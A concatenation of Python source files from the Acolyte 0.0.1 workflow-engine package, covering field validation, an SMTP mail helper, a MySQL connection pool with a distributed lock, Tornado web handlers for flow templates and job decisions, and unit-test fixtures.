from acolyte.core.service import Result
from acolyte.util.lang import get_from_nested_dict
class Field:
"""该类型对象用于描述一个字段的类型、转换规则、验证逻辑等等
"""
def __init__(self, name: str, type_: type, required: bool=True,
default: Any=None,
value_of: type or FunctionType or None=None,
check_logic: FunctionType or None=None):
"""
:param name: 字段名称
:param type_: 期待类型
:param required: 该字段是否是必须的
:param default: 如果不是必须的,该字段的默认值
:param value_of: 如果类型不匹配,回调该函数进行转换
:param check_logic: 验证逻辑
"""
self._name = name
self._type = type_
self._required = required
self._default = default
self._value_of = value_of
self._check_logic = check_logic
@property
def name(self):
return self._name
@property
def type(self):
return self._type
@property
def required(self):
return self._required
@property
def default(self):
return self._default
def __call__(self, value: Any) -> Any:
"""调用call完成对目标值的转换和检查
"""
value = self._base_check(value)
value = self._customize_check(value)
# 检查逻辑
if self._check_logic is not None:
_result = self._check_logic(self._name, value)
if _result is not None:
value = _result
# 返回最终转换的结果
return value
def _base_check(self, value: Any) -> Any:
# 必须且为空,抛出异常
if self._required and (value is None or value == ""):
raise InvalidFieldException(self._name, value, "empty", "")
# 非必须且为空,返回默认值
if not self._required and (value is None or value == ""):
return self._default
# 类型与期望不符,
if not isinstance(value, self._type):
if self._value_of is not None:
try:
value = self._value_of(value)
except Exception:
raise InvalidFieldException(
self._name, value, "invalid_type", self._type.__name__)
else:
raise InvalidFieldException(
self._name, value, "invalid_type", self._type.__name__)
return value
def _customize_check(self, value):
"""自定义检查,子类可以实现
"""
return value
class IntField(Field):
"""该类型对象用于描述一个整数值的验证规则
"""
def __init__(self, name: str, required: bool=True,
default: int=0, value_of: type or FunctionType or None=int,
min_: int or None=None, max_: int or None=None,
check_logic: FunctionType or None=None):
"""
:param min: 最小值
:param max: 最大值
"""
super().__init__(
name=name,
type_=int,
required=required,
default=default,
value_of=value_of,
check_logic=check_logic
)
self._min, self._max = min_, max_
@property
def min(self):
return self._min
@property
def max(self):
return self._max
def _customize_check(self, value):
# 比最小值还要小
if self._min is not None and value < self._min:
raise InvalidFieldException(
self._name, value, "less_than_min", self._min)
# 比最大值还大
if self._max is not None and value > self._max:
raise InvalidFieldException(
self._name, value, "more_than_max", self._max)
return value
class StrField(Field):
"""该类型对象用于描述一个字符串值的验证规则
"""
def __init__(self, name: str, required: bool=True,
default: int=0, value_of: type or FunctionType or None=str,
min_len: int or None=None, max_len: int or None=None,
regex: str or None=None,
check_logic: FunctionType or None=None):
"""
:param min_length: 允许的最小长度
:param max_length: 允许的最大长度
:param regex: 满足的正则表达式
"""
super().__init__(
name=name,
type_=str,
required=required,
default=default,
value_of=value_of,
check_logic=check_logic
)
self._min_len, self._max_len = min_len, max_len
self._regex = regex
@property
def min_len(self):
return self._min_len
@property
def max_len(self):
return self._max_len
@property
def regex(self):
return self._regex
def _customize_check(self, value):
# 检查长度
val_length = len(value)
if self._min_len is not None and val_length < self._min_len:
raise InvalidFieldException(
self._name, value, "less_than_min_length", self._min_len)
if self._max_len is not None and val_length > self._max_len:
raise InvalidFieldException(
self._name, value, "more_than_max_length", self._max_len)
if self._regex is not None and not re.search(self._regex, value):
raise InvalidFieldException(
self._name, value, "invalid_format", self._regex)
return value
class InvalidFieldException(EasemobFlowException):
"""当字段不满足Rule对象的期望条件时,抛出此异常
"""
def __init__(self, field_name, value, reason, expect):
"""
:param field_name: 字段名称
:param value: 字段值
:param reason: 引发错误原因
:param expect: 期望的类型/值/规则
"""
self._field_name = field_name
self._value = value
self._reason = reason
self._expect = expect
super().__init__((
"Invalid field {field}={value}, "
"reason={reason}, expect={expect}"
).format(field=field_name, value=value, reason=reason, expect=expect))
@property
def field_name(self):
return self._field_name
@property
def value(self):
return self._value
@property
def reason(self):
return self._reason
@property
def expect(self):
return self._expect
class BadReq(Exception):
"""被check修饰的服务接口抛出此异常,可以直接返回bad request result
"""
def __init__(self, reason, **args):
self._reason = reason
self._args = args
@property
def reason(self):
return self._reason
@property
def args(self):
return self._args
def check(*fields, messages=messages,
default_validate_messages=default_validate_messages):
"""该decorator用在service对象方法上验证参数
:param fields: 参数规则声明
:pram messages: 消息集合
"""
fields_dict = {f.name: f for f in fields}
def _check(f):
@wraps(f)
def _func(self, *args, **kwds):
nonlocal fields_dict
try:
# 组装并验证参数
new_args = [field(arg_val)
for field, arg_val in zip(fields, args)]
new_kwds = {arg_name: fields_dict[arg_name](arg_val)
for arg_name, arg_val in kwds.items()}
except InvalidFieldException as e:
full_reason = "{field_name}_{reason}".format(
field_name=e.field_name, reason=e.reason)
loc, _ = locale.getlocale(locale.LC_CTYPE)
service_id = self.__class__.__name__
mtd_name = f.__name__
# 先从用户messages集合中获取
msg = get_from_nested_dict(
messages, loc, service_id, mtd_name, full_reason)
if msg is None:
# 用户messages集合取不到再取默认的
msg = default_validate_messages[loc][e.reason]
if e.expect is not None or e.expect != "":
msg = msg.format(
field_name=e.field_name, expect=e.expect)
else:
msg = msg.format(field_name=e.field_name)
else:
if e.expect is not None or e.expect != "":
msg = msg.format(expect=e.expect)
return Result.bad_request(full_reason, msg=msg)
else:
try:
return f(self, *new_args, **new_kwds)
except BadReq as e:
loc, _ = locale.getlocale(locale.LC_CTYPE)
msg = messages[loc][
self.__class__.__name__][f.__name__][e.reason]
if e.args:
msg = msg.format(**e.args)
return Result.bad_request(e.reason, msg=msg)
return _func
return _check
def declare_args(*fields):
"""该decorator用于在方法上声明验证规则
被修饰的方法对象会拥有一个field_rules对象
:param fields: 被修饰函数的参数规则集合
"""
def _declare_args(f):
f.field_rules = fields
@wraps(f)
def _func(*args, **kwds):
return f(*args, **kwds)
return _func
return _declare_args | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/util/validate.py | validate.py |
import types
import smtplib
from email import encoders
from email.header import Header
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
class Attachment:
"""Attachment对象用来描述一个邮件附件
"""
def __init__(self, filepath, mime_type, attachment_filename):
"""
:param filepath: 附件所引用的具体文件路径
:param mime_type: 附件的mime类型
:param attachment_filename: 展示为附件时的文件名称
"""
self.filepath = filepath
self.mime_type = mime_type
self.attachment_filename = attachment_filename
def build_mime_object(self):
"""构建Mime对象"""
mime_type = self._mime_type.split("/")
mime = MIMEBase(mime_type[0], mime_type[1])
mime.set_payload(self._gen_payload())
encoders.encode_base64(mime)
mime.add_header(
'Content-Disposition',
'attachment; filename="{}"'.format(self._attachment_filename))
return mime
def _gen_payload(self):
# 文件类型的情况
if isinstance(self._attachment_file, types.FileType):
try:
return self._attachment_file.read()
finally:
self._attachment_file.close()
# 字符串路径的情况
elif isinstance(self._attachment_file, types.StringTypes):
with open(self._attachment_file, "r") as f:
return f.read()
# StringIO or cStringIO
else:
self._attachment_file.seek(0)
return self._attachment_file.read()
def send_mail(receiver, subject, content,
encoding="utf-8", attachments=None):
"""调用该函数可以发送邮件
:param receiver: 收件人
:param sender: 发件人
:param subject: 主题
:param content: 邮件正文
:param encoding: 编码
:param attachments: 附件列表
"""
global _smtp_config
smtp_server = smtplib.SMTP(
host=_smtp_config.host,
port=_smtp_config.port
)
smtp_server.login(_smtp_config.account, _smtp_config.password)
try:
msg = MIMEMultipart()
msg['From'] = _smtp_config.sender
msg['To'] = receiver
msg['Subject'] = Header(subject, encoding)
msg.attach(MIMEText(content, "html", encoding))
if attachments:
for attachment in attachments:
msg.attach(attachment.build_mime_object())
smtp_server.sendmail(
_smtp_config.sender,
[email_address.strip() for email_address in receiver.split(",")],
msg.as_string()
)
finally:
smtp_server.quit()
class SMTPConfig:
"""SMTP服务配置
"""
def __init__(self, host, port, account, password, sender, ssl=False):
self._host = host
self._port = port
self._account = account
self._password = password
self._sender = sender
self._ssl = ssl
@property
def host(self):
return self._host
@property
def port(self):
return self._port
@property
def account(self):
return self._account
@property
def password(self):
return self._password
@property
def sender(self):
return self._sender
def load_smtp_config(config):
"""加载smtp的相关配置
"""
global _smtp_config
_smtp_config = SMTPConfig(**config["smtp"]) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/util/mail.py | mail.py |
import inspect
import threading
def to_str(obj, *fields):
"""该函数用于方便生成__repr__和__str__方法的返回内容
:param obj: 目标对象
:param fields: 目标属性,如果不指定,则会返回所有
"""
# if fields is empty, auto get fields
if not fields:
try:
fields = obj.__dict__.keys()
except AttributeError:
# maybe slots class
fields = obj.__slots__
str_buf = [
"{class_name}@{id_} <",
]
for idx, field in enumerate(fields):
if isinstance(field, str):
# 单纯str
str_buf.append("{field}={value}".format(
field=field, value=getattr(obj, field)))
elif isinstance(field, tuple):
# 包含callback处理
field, callback = field
str_buf.append("{field}={value}".format(
field=field, value=callback(getattr(obj, field))))
else:
# 其它类型不支持
raise AttributeError("Unsupport field type: '{clazz}'".format(
clazz=field.__class__.__name__))
if idx < len(fields) - 1:
str_buf.append(", ")
str_buf.append(">")
return "".join(str_buf).format(
class_name=obj.__class__.__name__,
id_=id(obj)
)
def get_from_nested_dict(d, *keys, default=None):
"""从嵌套字典中获取值,如果在某一层级获取不到,则返回None
:param d: 目标字典
:param keys: 层级key列表
"""
for k in keys:
try:
d = d[k]
except KeyError:
return default
return d
def get_full_class_name(cls):
"""获取一个类的完整名称 包名.类名
"""
return cls.__module__ + "." + cls.__name__
_source_cache = {}
_source_cache_lock = threading.Lock()
def get_source_code(obj):
"""获取对象源码,inspect的这个效率啊,真是比鸭嘴笔还要efficiency!
"""
if obj not in _source_cache:
with _source_cache_lock:
if obj not in _source_cache:
_source_cache[obj] = inspect.getsource(obj)
return _source_cache[obj]
def trim_paragraph(text):
if not text:
return ""
buf = []
for line in text.splitlines():
buf.append(line.strip())
return "\n".join(buf) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/util/lang.py | lang.py |
import time
import pymysql
from queue import Queue
from contextlib import contextmanager
from acolyte.util import log
class ConnectionPool:
"""
基于Queue的数据库连接池
"""
def __init__(self, config, max_pool_size=20):
self.config = config
self.max_pool_size = max_pool_size
self._initialize_pool()
log.acolyte.info(
"init pool config: max_pool_size = {}".format(max_pool_size))
def _initialize_pool(self):
self.pool = Queue(maxsize=self.max_pool_size)
for _ in range(0, self.max_pool_size):
conn = _PooledMySQLConnection(**self.config)
self.pool.put_nowait(conn)
log.acolyte.debug((
"init db connection "
"host = {host}, port = {port}, "
"user = {user}, db = {db}"
).format(**self.config))
@contextmanager
def connection(self):
# returns a db instance when one is available else waits until one is
connection = self.pool.get(True)
yield connection
self.return_connection(connection)
def return_connection(self, db):
return self.pool.put_nowait(db)
def close_all(self):
"""关闭所有连接,容器析构的时候回调
"""
while not self.is_empty():
self.pool.get().close()
def is_empty(self):
return self.pool.empty()
def query_one(self, sql, args, mapper=None):
def callback(cursor):
nonlocal sql, args
num = cursor.execute(sql, args)
if num:
return cursor.fetchone()
return None
result = self.cursor_callback(callback)
if result is None:
return result
if mapper is None:
return result
return mapper(result)
def query_one_field(self, sql, args):
record = self.query_one(sql, args)
if not record:
return None
return tuple(record.values())[0]
def query_all(self, sql, args, mapper=None):
def callback(cursor):
nonlocal sql, args
num = cursor.execute(sql, args)
if num:
return cursor.fetchall()
return []
results = self.cursor_callback(callback)
if mapper is None:
return results
return [mapper(r) for r in results]
def execute(self, sql, args):
def callback(cursor):
nonlocal sql, args
num = cursor.execute(sql, args)
return num
row_num = self.cursor_callback(callback)
return row_num
def executemany(self, sql, args):
def callback(cursor):
nonlocal sql, args
cursor.executemany(sql, args)
self.cursor_callback(callback)
def cursor_callback(self, callback):
with self.connection() as conn:
with conn.cursor() as cursor:
rs = callback(cursor)
conn.commit()
return rs
@contextmanager
def lock(self, lock_key, wait_timeout=-1):
"""基于MySQL的分布式锁,详情请参见mysql的get_lock函数
:param lock_key: 锁关键字,通过该关键字来标识一个锁
:param wait_timeout: 等待超时时间,如果为负数,那么永不超时
"""
with self.connection() as conn:
with conn.cursor() as cursor:
cursor.execute("select get_lock(%s, %s) as l",
(lock_key, wait_timeout))
rs = cursor.fetchone()
yield rs['l'] == 1
cursor.execute("select release_lock(%s)", (lock_key,))
class _PooledMySQLConnection:
"""该类型对象表示一个被池化的连接
"""
def __init__(self, host, port, user, password, db,
charset="utf8", cursorclass=pymysql.cursors.DictCursor,
ping_interval=60):
self._connection = pymysql.connect(
host=host,
port=port,
user=user,
password=password,
db=db,
charset=charset,
cursorclass=pymysql.cursors.DictCursor)
self._last_ping = time.time()
self._ping_interval = ping_interval
def _ping(self):
if time.time() - self._last_ping >= self._ping_interval:
need_re_connect = False
try:
with self._connection.cursor() as csr:
csr.execute("SELECT 1", tuple())
result = csr.fetchone()
if not result:
need_re_connect = True
except pymysql.err.OperationalError:
need_re_connect = True
if need_re_connect:
self._connection.connect()
def cursor(self):
self._ping()
return self._connection.cursor()
def commit(self):
return self._connection.commit()
def close(self):
return self._connection.close()
def rollback(self):
return self._connection.rollback()
def load_db_config(config):
db_pool_cfg = config.get("db_pool", {})
max_pool_size = db_pool_cfg.get("pool_size", 10)
db_connect_cfg = config.get("db", {
"host": "localhost",
"port": 3306,
"user": "root",
"password": "",
"db": "easemob_flow",
})
connection_pool = ConnectionPool(db_connect_cfg, max_pool_size)
globals()["default"] = connection_pool
return connection_pool | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/util/db.py | db.py |
from collections import OrderedDict
import simplejson as json
from acolyte.web import (
BaseWebHandler,
check_token
)
from acolyte.core.service import Result
from acolyte.core.job import ActionArg
class FlowMetaHandler(BaseWebHandler):
@check_token
def get(self, flow_meta_name):
"""查询某个FlowMeta的详情
"""
flow_service = self._("FlowService")
rs = flow_service.get_flow_meta_info(flow_meta_name)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
flow_templates_rs = flow_service\
.get_flow_templates_by_flow_meta_name(flow_meta_name)
self.render(
"flow_meta_details.html",
flow_meta_name=flow_meta_name,
flow_meta_details=rs.data,
flow_templates=flow_templates_rs.data
)
class ViewTemplateHandler(BaseWebHandler):
@check_token
def get(self, flow_template_id):
"""查询某个FlowTemplate的详情
"""
flow_service = self._("FlowService")
rs = flow_service.get_flow_template(flow_template_id)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
# 判断有无绑定参数
bind_args = rs.data.bind_args
action_num, empty_num = 0, 0
for step_name in bind_args:
for action in bind_args[step_name]:
action_num += 1
if not bind_args[step_name][action]:
empty_num += 1
bind_args_json = json.dumps(
bind_args, indent=4, ensure_ascii=False)
config_json = json.dumps(
rs.data.config, indent=4, ensure_ascii=False)
return self.render(
"flow_template_details.html",
details=rs.data,
bind_args_empty=action_num == empty_num,
bind_args_json=bind_args_json,
config_json=config_json
)
class CreateTemplateHandler(BaseWebHandler):
@check_token
def get(self):
"""显示创建flow template页面
"""
flow_meta_name = self.get_query_argument("meta")
flow_service = self._("FlowService")
rs = flow_service.get_flow_meta_info(flow_meta_name)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
flow_meta_details = rs.data
return self.render(
"create_flow_template.html",
flow_meta_details=flow_meta_details,
bind_args=self._render_bind_args_tpl(flow_meta_details)
)
def _render_bind_args_tpl(self, flow_meta_details):
"""渲染bind_args模板
"""
job_mgr = self._("job_manager")
bind_args = OrderedDict()
for job_ref in flow_meta_details.jobs:
job_name = job_ref.job_name
job_define = job_mgr.get(job_name)
bind_args[job_ref.step_name] = {
action: self._render_act_args_tpl(job_define.job_args[action])
for action in job_define.job_args}
return bind_args
def _render_act_args_tpl(self, action_args):
return {
a.name: {
"type": a.field_info.type.__name__,
"value": a.field_info.default,
"mark": a.mark,
"comment": a.comment
} for a in action_args
if a.mark != ActionArg.MARK_CONST
}
@check_token
def post(self):
"""执行创建, 需要Ajax请求
"""
(
follow_meta_name,
name,
max_run_instance,
config,
bind_args
) = self._form(
"flow_meta",
"name",
"max_run_instance",
"config",
"bind_args"
)
config = _parse_json(config)
# config json解析失败
if config is None:
self._output_result(Result.bad_request(
"invalid_config_fmt", msg="Config JSON格式有误"))
return
bind_args = _parse_json(bind_args)
# bind_args json解析失败
if bind_args is None:
self._output_result(Result.bad_request(
"invalid_bind_args_fmt", msg="Bind args JSON格式有误"))
return
rs = self._("FlowService").create_flow_template(
flow_meta_name=follow_meta_name,
name=name,
bind_args=bind_args,
max_run_instance=max_run_instance,
config=config,
creator=self.request.current_user.id
)
self._output_result(rs)
class ModifyTemplateHandler(BaseWebHandler):
@check_token
def post(self):
"""修改Flow template配置
"""
(
tpl_id,
name,
bind_args_json,
max_run_instance,
config_json
) = self._form(
"tpl_id",
"name",
"bind_args",
"max_run_instance",
"config"
)
config = _parse_json(config_json)
# config解析错误
if config is None:
self._output_result(Result.bad_request(
"invalid_config_fmt", msg="Config JSON格式有误"))
return
bind_args = _parse_json(bind_args_json)
# bind_args 解析错误
if bind_args is None:
self._output_result(Result.bad_request(
"invalid_bind_args_fmt", msg="Bind args JSON格式有误"))
return
# 执行修改
rs = self._("FlowService").modify_flow_template(
flow_tpl_id=tpl_id,
name=name,
bind_args=bind_args,
max_run_instance=max_run_instance,
config=config
)
self._output_result(rs)
class ViewFlowInstanceHandler(BaseWebHandler):
@check_token
def get(self, flow_instance_id):
"""FlowInstance终端页
"""
flow_service = self._("FlowService")
job_mgr = self._("job_manager")
rs = flow_service.get_flow_instance_details(flow_instance_id)
if rs.is_success():
flow_meta_info = flow_service.get_flow_meta_info(
rs.data.flow_tpl.flow_meta_name).data
jobs = {
job_ref.job_name: job_mgr.get(job_ref.job_name)
for job_ref in flow_meta_info.jobs
}
steps = {step.step_name: step for step in rs.data.steps}
self.render(
"flow_instance_details.html",
details=rs.data,
flow_meta_info=flow_meta_info,
jobs=jobs,
steps=steps
)
else:
self.render("tip.html", msg=rs.msg)
def _parse_json(json_str):
if not json_str:
return {}
else:
try:
return json.loads(json_str)
except:
return None
class DiscardFlowInstanceHandler(BaseWebHandler):
@check_token
def post(self):
flow_exec_service = self._("FlowExecutorService")
flow_instance_id, reason = self._form("flow_instance_id", "reason")
actor_id = self.request.current_user.id
rs = flow_exec_service.discard_flow_instance(
int(flow_instance_id), actor_id, reason)
self._output_result(rs)
class ViewFlowGroupDetailsHandler(BaseWebHandler):
@check_token
def get(self, group_id):
flow_service = self._("FlowService")
rs = flow_service\
.get_flow_instance_group_details(group_id)
self.render("flow_group_details.html", details=rs.data) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/web/flow.py | flow.py |
from acolyte.web import (
BaseWebHandler,
check_token
)
from acolyte.core.service import Result
from acolyte.core.storage.job_instance import JobInstanceDAO
class ViewJobDetailsHandler(BaseWebHandler):
@check_token
def get(self, job_name):
job_service = self._("JobService")
rs = job_service.get_job_details_by_name(job_name)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
return self.render(
"job_details.html",
details=rs.data
)
class ViewJobInstanceDetailsHandler(BaseWebHandler):
@check_token
def get(self, job_instance_id, original=None):
rs = self._("JobService")\
.get_job_instance_details(job_instance_id)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
job_instance_details = rs.data
job_mgr = self._("job_manager")
job_define = job_mgr.get(job_instance_details.job_name)
if job_define.ui is None or original == "original":
self.render(
"job_instance_details.html",
details=job_instance_details,
job_define=job_define
)
else:
content = job_define.ui.render_instance_details_page(
details=job_instance_details,
job_define=job_define,
request=self.request
)
self.render(
"customize_job_instance_details.html",
content=content
)
class JobDecisionHandler(BaseWebHandler):
@check_token
def get(self, job_instance_id, decision_name):
"""渲染展示Decision页面
"""
rs = self._("JobService").get_decision_info(
job_instance_id, decision_name)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
self.render(
"job_decision.html",
details=rs.data,
instance_id=job_instance_id
)
@check_token
def post(self, job_instance_id, action):
"""执行选择的Action
"""
job_instance_dao = JobInstanceDAO(self._("db"))
job_instance = job_instance_dao.query_by_id(job_instance_id)
if job_instance is None:
self._output_result(
Result.bad_request(
"job_instance_not_found",
msg="找不到指定的Job instance: {}".format(job_instance.id))
)
return
action_args = {
name: value_list[0].decode("utf-8")
for name, value_list in self.request.arguments.items()}
self._print_json(action_args)
flow_executor_service = self._("FlowExecutorService")
rs = flow_executor_service.handle_job_action(
flow_instance_id=job_instance.flow_instance_id,
target_step=job_instance.step_name,
target_action=action,
actor=self.request.current_user.id,
action_args=action_args
)
self._print_json(rs)
self._output_result(rs) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/web/job.py | job.py |
import datetime
from functools import wraps
from acolyte.util.json import to_json
from tornado.web import RequestHandler
class BaseWebHandler(RequestHandler):
def _(self, service_id):
return BaseWebHandler.service_container.get_service(service_id)
def _form(self, *field_names, strip=True):
return [
self.get_body_argument(field_name, "", strip=strip)
for field_name in field_names
]
def _query_args(self, *field_names, strip=True):
return [
self.get_query_argument(field_name, "", strip=strip)
for field_name in field_names
]
def _date_scope(self, prefix=""):
(
begin_year_str,
begin_month_str,
begin_day_str,
end_year_str,
end_month_str,
end_day_str
) = self._query_args(
"begin_year",
"begin_month",
"begin_day",
"end_year",
"end_month",
"end_day"
)
return datetime.date(
year=int(begin_year_str),
month=int(begin_month_str),
day=int(begin_day_str)
), datetime.date(
year=int(end_year_str),
month=int(end_month_str),
day=int(end_day_str)
)
def _print_json(self, obj):
"""打印json,供调试使用
"""
print(to_json(obj))
def _output_result(self, rs):
"""将result对象按照json的格式输出
"""
self.set_header('Content-Type', 'application/json')
self.write(to_json(rs))
self.finish()
class ReqUser:
@classmethod
def from_session_data(cls, session_data):
return cls(
id_=session_data["id"],
email=session_data["session_data"]["email"],
name=session_data["session_data"]["name"]
)
def __init__(self, id_, email, name):
self._id = id_
self._email = email
self._name = name
@property
def id(self):
return self._id
@property
def email(self):
return self._email
@property
def name(self):
return self._name
def check_token(func):
@wraps(func)
def _f(self, *args, **kwds):
token = self.get_secure_cookie("_t")
if token is None:
self.redirect("/login?redirect={}".format(self.request.uri))
return
token = token.decode("utf-8")
rs = self._("UserService").check_token(token)
if rs.is_success():
self.request._token = token
self.request.current_user = ReqUser.from_session_data(rs.data)
return func(self, *args, **kwds)
else:
self.redirect("/login?redirect={}".format(self.request.uri))
return
return _f | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/web/__init__.py | __init__.py |
import os
import atexit
import fixtures
from concurrent.futures import ThreadPoolExecutor
from acolyte.util.service_container import ServiceContainer
from acolyte.core.bootstrap import AbstractBootstrap
from acolyte.testing.core.mgr_define import (
flow_meta_mgr,
job_mgr,
notify_tpl_mgr
)
from acolyte.util import db
from acolyte.util import log
from acolyte.util.json import to_json
from acolyte.core.service import Result
from acolyte.core.flow_service import FlowService
from acolyte.core.user_service import UserService
from acolyte.core.job_service import JobService
from acolyte.core.flow_executor_service import FlowExecutorService
from acolyte.core.notify_logic import NotifyLogic
from acolyte.core.storage.flow_template import FlowTemplateDAO
from acolyte.core.storage.flow_instance import FlowInstanceDAO
from acolyte.core.storage.job_instance import JobInstanceDAO
from acolyte.core.storage.job_action_data import JobActionDataDAO
from acolyte.core.context import AbstractFlowContext
from acolyte.util.conf import load_from_py_module
from acolyte.util.mail import load_smtp_config
class UnitTestBootstrap(AbstractBootstrap):
def __init__(self):
super().__init__()
def start(self, config):
log.load_logger_config(config)
self.service_container = ServiceContainer()
atexit.register(self.service_container.finalize)
load_smtp_config(config)
self._binding(config, self.service_container)
def _binding(self, config, service_container):
db_pool = db.load_db_config(config)
service_container.register(
service_id="db",
service_obj=db_pool,
finalize=lambda: db_pool.close_all()
)
service_container.register(
service_id="job_manager",
service_obj=job_mgr
)
service_container.register(
service_id="flow_meta_manager",
service_obj=flow_meta_mgr
)
service_container.register(
service_id="notify_tpl_manager",
service_obj=notify_tpl_mgr
)
notify_executor = ThreadPoolExecutor(10)
service_container.register(
service_id="notify_executor",
service_obj=notify_executor,
finalize=lambda: notify_executor.shutdown()
)
service_container.register_service(FlowService)
service_container.register_service(UserService)
service_container.register_service(JobService)
service_container.register_service(FlowExecutorService)
service_container.register_service(NotifyLogic)
service_container.after_register()
def load_config():
return load_from_py_module(
os.environ.get(
"ACOLYTE_TEST_CONFIG", "config/acolyte_test_config.py"))
_test_bootstrap = UnitTestBootstrap()
_test_bootstrap.start(load_config())
test_container = _test_bootstrap.service_container
class EasemobFlowTestCase(fixtures.TestWithFixtures):
def _(self, service_id):
"""从容器中获取服务
"""
global test_container
self._test_container = test_container
return test_container.get_service(service_id)
def print_json(self, obj):
print(to_json(obj, indent=4 * ' '))
def assertResultSuccess(self, result):
self.assertEqual(result.status_code, Result.STATUS_SUCCESS)
def assertResultBadRequest(self, result, reason):
self.assertEqual(result.status_code, Result.STATUS_BADREQUEST)
self.assertEqual(result.reason, reason)
class FlowTemplateFixture(fixtures.Fixture):
"""该fixture可以用来创建和销毁FlowTemplate对象
"""
def __init__(self, flow_meta_name, tpl_name, bind_args, max_run_instance,
config, creator, service_container):
self._flow_meta_name = flow_meta_name
self._tpl_name = tpl_name
self._bind_args = bind_args
self._max_run_instance = max_run_instance
self._config = config
self._creator = creator
self._flow_service = service_container.get("FlowService")
self._flow_tpl_dao = FlowTemplateDAO(service_container.get("db"))
@property
def flow_template(self):
return self._flow_template
def setUp(self):
self._flow_template = self._flow_service.create_flow_template(
flow_meta_name=self._flow_meta_name,
name=self._tpl_name,
bind_args=self._bind_args,
max_run_instance=self._max_run_instance,
config=self._config,
creator=self._creator
).data
def cleanUp(self):
self._flow_tpl_dao.delete_by_id(self._flow_template.id)
class FlowInstanceFixture(fixtures.Fixture):
"""该fixture可以用来创建和销毁FlowInstance
"""
def __init__(self, tpl_id, initiator, description,
start_flow_args, service_container):
self._tpl_id = tpl_id
self._initiator = initiator
self._description = description
self._start_flow_args = start_flow_args
self._flow_executor_service = service_container.get(
"FlowExecutorService")
_db = service_container.get("db")
self._flow_instance_dao = FlowInstanceDAO(_db)
self._job_instance_dao = JobInstanceDAO(_db)
self._job_action_data_dao = JobActionDataDAO(_db)
@property
def flow_instance(self):
return self._flow_instance
def setUp(self):
self._flow_instance = self._flow_executor_service.start_flow(
flow_template_id=self._tpl_id,
initiator=self._initiator,
description=self._description,
start_flow_args=self._start_flow_args
).data
def cleanUp(self):
# 清理创建的flow_instance
self._flow_instance_dao.delete_by_instance_id(
self._flow_instance.id)
job_instance_lst = self._job_instance_dao.\
query_by_flow_instance_id(self._flow_instance.id)
# 删除整个flow instance下的job instance
self._job_instance_dao.delete_by_flow_instance_id(
self._flow_instance.id)
# 删除各个job action dat
for job_instance in job_instance_lst:
self._job_action_data_dao.delete_by_job_instance_id(
job_instance.id)
class MockContext(AbstractFlowContext):
def __init__(self, executor, config, flow_instance_id, job_instance_id,
job_action_id, current_step):
super().__init__(executor, config)
self._flow_instance_id = flow_instance_id
self._job_instance_id = job_instance_id
self._job_action_id = job_action_id
self._current_step = current_step
self._saved_data = {
flow_instance_id: {
job_instance_id: {
}
}
}
self._context_data = {}
@property
def context_data(self):
return self._context_data
@property
def saved_data(self):
return self._saved_data
def failure(self):
...
def finish(self):
...
def __getitem__(self, key):
return self._context_data[key]
def __setitem__(self, key, value):
self._context_data[key] = value
def __delitem__(self, key):
del self._context_data[key]
def __len__(self):
return len(self._context_data)
def __iter__(self):
return self._context_data.keys()
def get(self, key, default):
return self._context_data.get(key, default)
def items(self):
return self._context_data.items()
def keys(self):
return self._context_data.keys()
def values(self):
return self._context_data.values()
def save(self, data):
self._saved_data[self._flow_instance_id][
self._job_instance_id][self._job_action_id] = data | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/__init__.py | __init__.py |
from acolyte.testing import EasemobFlowTestCase
from acolyte.core.storage.flow_template import FlowTemplateDAO
from acolyte.core.storage.flow_instance import FlowInstanceDAO
from acolyte.core.storage.job_instance import JobInstanceDAO
from acolyte.core.storage.job_action_data import JobActionDataDAO
from acolyte.core.storage.flow_discard_reason import FlowDiscardReasonDAO
class AbstractFlowExecTestCase(EasemobFlowTestCase):
def setUp(self):
self._db = self._("db")
self._flow_exec = self._("FlowExecutorService")
self._flow_service = self._("FlowService")
self._job_service = self._("JobService")
self._flow_tpl_dao = FlowTemplateDAO(self._db)
self._flow_instance_dao = FlowInstanceDAO(self._db)
self._job_instance_dao = JobInstanceDAO(self._db)
self._job_action_data_dao = JobActionDataDAO(self._db)
self._flow_discard_reason_dao = FlowDiscardReasonDAO(self._db)
self._flow_tpl_id_collector = []
self._flow_instance_id_collector = []
# 创建一个flow template供测试使用
bind_args = {
"echo": {
"trigger": {
"b": "$config.b"
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
}
rs = self._flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test",
bind_args=bind_args,
max_run_instance=1,
config={"dev_email": "[email protected]", "b": 2},
creator=1
)
self.print_json(rs)
self._tpl_id = rs.data.id
self._flow_tpl_id_collector.append(self._tpl_id)
def tearDown(self):
# 各种清数据
if self._flow_tpl_id_collector:
self._flow_tpl_dao.delete_by_id(self._flow_tpl_id_collector)
if self._flow_instance_id_collector:
self._flow_instance_dao.delete_by_instance_id(
self._flow_instance_id_collector)
for flow_instance_id in self._flow_instance_id_collector:
job_instance_lst = self._job_instance_dao.\
query_by_flow_instance_id(flow_instance_id)
self._job_instance_dao.delete_by_flow_instance_id(
flow_instance_id)
self._flow_discard_reason_dao.\
delete_by_flow_instance_id(flow_instance_id)
for job_instance in job_instance_lst:
self._job_action_data_dao.delete_by_job_instance_id(
job_instance.id)
# 清除上下文
self._db.execute("truncate flow_context", tuple())
class FlowExecutorServiceTestCase(AbstractFlowExecTestCase):
def setUp(self):
super(FlowExecutorServiceTestCase, self).setUp()
def testStartFlow(self):
"""测试启动flow实例
